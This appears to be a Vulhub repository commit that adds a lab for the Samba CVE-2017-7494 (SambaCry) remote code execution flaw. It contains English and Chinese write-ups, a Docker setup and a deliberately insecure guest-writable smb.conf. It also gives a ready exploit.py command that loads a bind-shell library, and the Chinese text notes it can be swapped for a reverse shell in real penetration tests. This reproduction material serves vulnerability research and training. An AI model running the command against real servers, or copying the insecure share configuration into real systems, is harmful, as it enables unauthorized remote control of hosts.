aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
samba/CVE-2017-7494/01.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 21 KiB

BIN
samba/CVE-2017-7494/02.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 11 KiB

77
samba/CVE-2017-7494/README.md Normal file
View File

@@ -0,0 +1,77 @@
# Samba Authenticated RCE (CVE-2017-7494, Aka SambaCry)
[中文版本(Chinese version)](README.zh-cn.md)
Samba is the standard Windows interoperability suite of programs for Linux and Unix, it provides secure, stable and fast file and print services for all clients using the SMB/CIFS protocol.
Samba 3.x after 3.5.0 and 4.x before 4.4.14, 4.5.x before 4.5.10, and 4.6.x before 4.6.4 that is vulnerable to a remote code execution vulnerability named **SambaCry**. CVE-20177494 allows remote authenticated users to upload a shared library to a writable shared folder, and perform code execution attacks to take control of servers that host vulnerable Samba services.
## Environment Setup
Execute following commands to start a Samba server 4.6.3:
```
docker compose up -d
```
## Principle
Reference to [SambaCry RCE Exploit](https://medium.com/@lucideus/sambacry-rce-exploit-lucideus-research-3a3e5bd9e17c):
> Microsoft Remote Procedure Call (RPC) is a powerful technology for creating distributed client/server programs. RPC is an interprocess communication technique that allows client and server software to communicate.
>
> MSRPC protocol allows to connect to a named pipe from remote destination. When trying to open a pipe using MSRPC on Samba, the server verifies the validity of the pipe name using the internal function `is_known_pipename()`.
>
> An external RPC server can be set using the 'rpc_server' variable inside smb.conf and then it will handle the pipe request.
>
> The function `is_known_pipename()` doesnt check that the pipe is valid, this allows to use '/' to insert a full path of an arbitrary library.
The exploitation requirements:
- An anonymous writeable server or an authenticated Samba account
- A known path of the writeable sharing directory
See also:
- https://medium.com/@lucideus/sambacry-rce-exploit-lucideus-research-3a3e5bd9e17c
- https://github.com/opsxcq/exploit-CVE-2017-7494
- http://bobao.360.cn/learning/detail/3900.html
## Exploit
Samba config ( you can find [here](smb.conf) ) of our target server:
```
[global]
map to guest = Bad User
server string = Samba Server Version %v
guest account = nobody
[myshare]
path = /home/share
read only = no
guest ok = yes
guest only = yes
```
Use `smbclient` to test connecting:
```
smbclient //your-ip/myshare -N
```
![](02.png)
If you got connection error, please check your network, especially port 445.
Using <https://github.com/opsxcq/exploit-CVE-2017-7494> to exploit the server:
```
./exploit.py -t your-ip -e libbindshell-samba.so -s myshare -r /home/share/libbindshell-samba.so -u guest -p guest -P 6699
```
Successful execute commands:
![](01.png)
Please note that, metasploit's `exploit/linux/samba/is_known_pipename` is tested failed since XX(I don't know) version, and I am really sure that it works on Jun 2017.

46
samba/CVE-2017-7494/README.zh-cn.md Normal file
View File

@@ -0,0 +1,46 @@
# Samba 远程命令执行漏洞CVE-2017-7494
运行测试环境
```
docker compose up -d
```
Samba版本4.6.3该漏洞在4.6.4被修复)
## 原理
Samba允许连接一个远程的命名管道并且在连接前会调用`is_known_pipename()`函数验证管道名称是否合法。在`is_known_pipename()`函数中,并没有检查管道名称中的特殊字符,加载了使用该名称的动态链接库。导致攻击者可以构造一个恶意的动态链接库文件,执行任意代码。
该漏洞要求的利用条件:
- 拥有共享文件写入权限,如:匿名可写等
- 需要知道共享目录的物理路径
参考:
- https://medium.com/@lucideus/sambacry-rce-exploit-lucideus-research-3a3e5bd9e17c
- https://github.com/opsxcq/exploit-CVE-2017-7494
- http://bobao.360.cn/learning/detail/3900.html
## 测试过程
测试环境运行后监听445端口默认开启了一个共享“myshare”共享的目录为`/home/share`,可读可写。
我们可以在Linux下用smbclient安装`apt install smbclient`)连接试试:
![](02.png)
成功连接。大家测试的时候如果连接不成功有可能是国内运营商封了445端口最好在本地或虚拟机测试比如上图。
参考[#224](https://github.com/vulhub/vulhub/issues/224)新版metasploit可能无法复现这个漏洞。我们使用<https://github.com/opsxcq/exploit-CVE-2017-7494>来复现。
在目标服务器上执行`/home/share/libbindshell-samba.so`其中myshare是分享名称在vulhub中为`myshare`),而`/home/share`是对应的可写目录。`-u``-p`用来指定用户名、密码当前环境是一个匿名smb所以填写任意信息均可。因为libbindshell-samba.so是一个bindshell监听地址是6699所以我们通过`-P`指定这个端口。在实际渗透中,我们可以修改`libbindshell-samba.c`写入任意其他代码如反弹shell避免使用bindshell。
```
./exploit.py -t your-ip -e libbindshell-samba.so -s myshare -r /home/share/libbindshell-samba.so -u guest -p guest -P 6699
```
成功执行命令:
![](01.png)

10
samba/CVE-2017-7494/docker-compose.yml Normal file
View File

@@ -0,0 +1,10 @@
version: '2'
services:
samba:
image: vulhub/samba:4.6.3
tty: true
volumes:
- ./smb.conf:/usr/local/samba/etc/smb.conf
ports:
- "445:445"
- "6699:6699"

10
samba/CVE-2017-7494/smb.conf Normal file
View File

@@ -0,0 +1,10 @@
[global]
map to guest = Bad User
server string = Samba Server Version %v
guest account = nobody
[myshare]
path = /home/share
read only = no
guest ok = yes
guest only = yes